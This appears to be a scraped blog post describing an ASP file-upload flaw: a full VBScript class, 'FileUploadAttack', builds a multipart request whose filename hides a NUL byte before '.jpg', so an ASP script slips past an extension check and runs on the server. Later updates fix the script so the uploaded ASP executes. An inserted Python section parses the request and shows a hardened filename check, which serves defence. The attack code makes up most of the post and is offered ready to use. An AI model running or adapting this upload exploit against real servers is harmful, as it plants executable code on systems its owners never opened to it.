ASP upload vulnerability: using Chr(0) to bypass the extension detection script

Source: Internet
Author: User
Tags: chr, gettext, sendfile

Today Demon mentioned this issue, which reminded me of an article I had seen earlier, "Automatic file upload using IE+ADO without user interaction - VBScript". That article gives an example of a local, non-interactive automatic upload script that can be borrowed here. The original script used the InternetExplorer.Application component; I rewrote it and implemented the same function with WinHttp.WinHttpRequest.5.1. For more on this component, refer to the WinHttpRequest Object Reference.

The script is as follows:

Option Explicit

' Reads a file as text (this is the line the update below replaces;
' ReadAll returns a text string, not the raw bytes of the file).
Function file_get_contents(filename)
    Dim fso, f
    Set fso = WSH.CreateObject("Scripting.FileSystemObject")
    Set f = fso.OpenTextFile(filename, 1)
    file_get_contents = f.ReadAll
    f.Close
    Set f = Nothing
    Set fso = Nothing
End Function

' Code modified from http://www.motobit.com/tips/detpg_uploadvbsie/
Class FileUploadAttack
    Private m_objWinHttp
    Private m_strURL
    Private m_strFieldName

    Private Sub Class_Initialize()
        Set m_objWinHttp = WSH.CreateObject("WinHttp.WinHttpRequest.5.1")
    End Sub

    Private Sub Class_Terminate()
        Set m_objWinHttp = Nothing
    End Sub

    Public Sub SetURL(url)
        m_strURL = url
    End Sub

    Public Sub SetFieldName(name)
        m_strFieldName = name
    End Sub

    ' Information in the form field header.
    Function MPFields(FieldName, FileName, ContentType)
        Dim MPTemplate ' template for multipart header
        MPTemplate = "Content-Disposition: form-data; name=""{field}""; " + _
            "filename=""{file}""" + vbCrLf + _
            "Content-Type: {ct}" + vbCrLf + vbCrLf
        Dim Out
        Out = Replace(MPTemplate, "{field}", FieldName)
        Out = Replace(Out, "{file}", FileName)
        MPFields = Replace(Out, "{ct}", ContentType)
    End Function

    ' Converts an OLE (Unicode) string to a multibyte string, one byte per character
    Function StringToMB(S)
        Dim I, B
        For I = 1 To Len(S)
            B = B & ChrB(Asc(Mid(S, I, 1)))
        Next
        StringToMB = B
    End Function

    ' Build multipart/form-data document with file contents and header info
    Function BuildFormData(FileContents, Boundary, FileName, FieldName)
        Dim FormData, Pre, Po
        Const ContentType = "application/upload"

        ' The two parts around the file contents in the multipart form data.
        Pre = "--" + Boundary + vbCrLf + MPFields(FieldName, FileName, ContentType)
        Po = vbCrLf + "--" + Boundary + "--" + vbCrLf

        ' Build form data using a recordset binary field
        Const adLongVarBinary = 205
        Dim RS: Set RS = WSH.CreateObject("ADODB.Recordset")
        RS.Fields.Append "b", adLongVarBinary, _
            Len(Pre) + LenB(FileContents) + Len(Po)
        RS.Open
        RS.AddNew
        Dim LenData
        ' Convert the Pre string value to binary data
        LenData = Len(Pre)
        RS("b").AppendChunk StringToMB(Pre) & ChrB(0)
        Pre = RS("b").GetChunk(LenData)
        RS("b") = ""

        ' Convert the Po string value to binary data
        LenData = Len(Po)
        RS("b").AppendChunk StringToMB(Po) & ChrB(0)
        Po = RS("b").GetChunk(LenData)
        RS("b") = ""

        ' Join Pre + FileContents + Po binary data
        RS("b").AppendChunk Pre
        RS("b").AppendChunk FileContents
        RS("b").AppendChunk Po
        RS.Update
        FormData = RS("b")
        RS.Close
        BuildFormData = FormData
    End Function

    Public Function SendFile(FileName)
        Const Boundary = "---------------------------0123456789012"
        m_objWinHttp.Open "POST", m_strURL, False
        m_objWinHttp.SetRequestHeader "Content-Type", _
            "multipart/form-data; boundary=" + Boundary

        Dim FileContents, FormData
        ' Get the source file as binary data.
        FileContents = file_get_contents(FileName)

        ' The malicious file name, extension Chr(0) & ".jpg", is constructed below.
        ' Build the multipart/form-data document
        FormData = BuildFormData(FileContents, Boundary, _
            FileName & Chr(0) & ".jpg", m_strFieldName)

        m_objWinHttp.Send FormData
        SendFile = m_objWinHttp.Status
    End Function

    Public Function GetText()
        GetText = m_objWinHttp.ResponseText
    End Function
End Class

Function VBMain()
    VBMain = 0

    Dim FileUpload
    Set FileUpload = New FileUploadAttack
    ' Modify the values below as appropriate
    ' Upload URL
    FileUpload.SetURL "http://localhost/upload/uploadfile.asp"
    ' Name of the upload form field
    FileUpload.SetFieldName "filepath"
    ' Path of the file to upload
    If FileUpload.SendFile("E:\projects\asp\index.asp") = 200 Then
        MsgBox "Upload Success" & FileUpload.GetText()
    Else
        MsgBox "Failure"
    End If
    Set FileUpload = Nothing
End Function

Call WScript.Quit(VBMain())

For the upload target, I grabbed a simple ASP upload script from the internet and added to it the GetFileExtensionName check described in my article "Asp/vbscript in Chr(0) and the origin of the security issues", which decides whether the extension is jpg.
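As an added example (not code from the post, nor from the upload script it tests), here is what the receiving side sees. It contains a minimal Python parser for the multipart/form-data body the script above builds, an extension check done the way the post's target does it (the text after the last dot, which is "jpg" because the string's length is honoured), the name that a NUL-terminated Win32 file API actually writes ("index.asp"), and a hardened check that rejects control characters before applying an extension allow-list. The boundary is the one from the script; the field name "filepath", the file name "index.asp" + NUL + ".jpg" and the file bytes are constructed sample values, and the function names (build_upload_body, parse_multipart, hardened_check and the rest) are this example's own.

```python
"""Parse a multipart/form-data upload and check the filename the way a
hardened ASP upload handler should. Added example, not from the post."""
import re

# Constructed sample values: the boundary the post's script uses and an
# allow-list for an image-only upload form (assumed policy, not the post's).
BOUNDARY = b"---------------------------0123456789012"
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "gif", "png"}
_FILENAME_RE = re.compile(r'filename="([^"]*)"')
_NAME_RE = re.compile(r'\bname="([^"]*)"')


def build_upload_body(field_name, file_name, content):
    """Assemble a one-part multipart/form-data body (same shape as BuildFormData)."""
    head = (f'--{BOUNDARY.decode()}\r\n'
            f'Content-Disposition: form-data; name="{field_name}"; filename="{file_name}"\r\n'
            f'Content-Type: application/upload\r\n\r\n').encode("latin-1")
    tail = b"\r\n--" + BOUNDARY + b"--\r\n"
    return head + content + tail


def parse_multipart(body, boundary=BOUNDARY):
    """Minimal multipart parser: returns a list of {name, filename, content} dicts."""
    parts = []
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter reached
            break
        if chunk.startswith(b"\r\n"):        # CRLF that follows the delimiter
            chunk = chunk[2:]
        raw_headers, _, content = chunk.partition(b"\r\n\r\n")
        if content.endswith(b"\r\n"):        # CRLF that precedes the next delimiter
            content = content[:-2]
        headers = {}
        # latin-1 keeps every byte, including a NUL inside the filename
        for line in raw_headers.decode("latin-1").split("\r\n"):
            key, _, value = line.partition(":")
            headers[key.strip().lower()] = value.strip()
        disposition = headers.get("content-disposition", "")
        name_match = _NAME_RE.search(disposition)
        file_match = _FILENAME_RE.search(disposition)
        parts.append({
            "name": name_match.group(1) if name_match else None,
            "filename": file_match.group(1) if file_match else None,
            "content": content,
        })
    return parts


def weak_extension(file_name):
    """Extension as a length-aware string function reports it: text after the last dot."""
    dot = file_name.rfind(".")
    return file_name[dot + 1:].lower() if dot >= 0 else ""


def name_written_to_disk(file_name):
    """Win32 file APIs take NUL-terminated names, so the saved name stops at the first NUL."""
    return file_name.split("\x00", 1)[0]


def hardened_check(file_name):
    """Return (accepted, reason-or-safe-basename). Control characters are rejected
    before any extension logic runs, then the bare basename's extension is allow-listed."""
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in file_name):
        return False, "control character in filename"
    base = re.split(r"[\\/]", file_name)[-1]
    if not base or base in (".", ".."):
        return False, "empty or reserved filename"
    if weak_extension(base) not in ALLOWED_EXTENSIONS:
        return False, "extension not allowed"
    return True, base


def audit_upload(body):
    """What the weak check saw, what would land on disk, and the hardened verdict."""
    part = next(p for p in parse_multipart(body) if p["filename"] is not None)
    name = part["filename"]
    return {
        "filename": name,
        "weak_check_ext": weak_extension(name),
        "on_disk_name": name_written_to_disk(name),
        "hardened": hardened_check(name),
    }


if __name__ == "__main__":
    sample = build_upload_body("filepath", "index.asp\x00.jpg", b"constructed file contents")
    for key, value in audit_upload(sample).items():
        print(f"{key}: {value!r}")
```

The order of checks in hardened_check matters: rejecting control characters first means no later string operation, and no file API with different NUL semantics, ever sees the crafted name; the allow-list on the basename then covers the ordinary ".asp" case the manual upload test already caught.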

Test results: uploading the ASP file manually failed; uploading it with the attack script above succeeded! The upload directory really does contain an ASP file, and it can be reached through the browser by URL, but strangely it shows a blank page. I am on IIS 7 here; is it the IIS version, or should file_get_contents perhaps return the file's binary stream? Well, that is the open question; there is something else to attend to, so I will leave it here.

All the experimental code is packed in upload.zip (for the code bug, see the update notes below).

Updated December 25, 2011

According to everyone's feedback, the uploaded file ends up in Unicode little-endian encoding. First of all, sorry, I was really lazy: the main code was taken from the foreigner's article, and he briefly mentioned a GetFile function that gets the file's binary data, but I did not find that function's implementation. Too lazy to implement binary reading, I used file_get_contents directly to get text data, and it turns out that is the problem. Below I take a remedial measure, again a lazy one: converting the text data into binary data on top of the existing code, using the ADODB.Stream component. The function is as follows:

The code is as follows:

' Converts the string str of the specified charset to binary
Function StrToBin(str, CharSet)
    With WSH.CreateObject("ADODB.Stream")
        .Type = 2            ' adTypeText
        .Mode = 3            ' adModeReadWrite
        .Open
        .Charset = CharSet
        .WriteText str
        .Flush
        .Position = 0
        .Type = 1            ' adTypeBinary: re-read the same bytes as binary
        StrToBin = .Read()
        .Close
    End With
End Function

Then change line 106 of the code above (the line "FileContents = file_get_contents(FileName)" in SendFile) to the following, which reads the text as ASCII:

The code is as follows:

FileContents = StrToBin(file_get_contents(FileName), "ASCII")

After this change the uploaded ASP file is an ordinarily encoded file, and when the browser accesses it you can see that the ASP was parsed successfully.

But this is a bit roundabout; in fact you can open the file directly in binary mode and return the data. The above takes two steps: 1. read the file as text; 2. convert the text to binary data. For the one-step version, refer to the following function, which reads the file data as a binary Byte() array:

The code is as follows:

' Returns the file contents as binary data
Function GetFile(FileName)
    Dim Stream: Set Stream = CreateObject("ADODB.Stream")
    Stream.Type = 1 ' adTypeBinary
    Stream.Open
    Stream.LoadFromFile FileName
    GetFile = Stream.Read
    Stream.Close
    Set Stream = Nothing
End Function

I will not write more optimized code; the main purpose is to describe the upload idea. If you want a complete upload implementation, refer to Demon's "VBS simulation post upload file".
Original: http://www.jb51.net/article/26103.htm
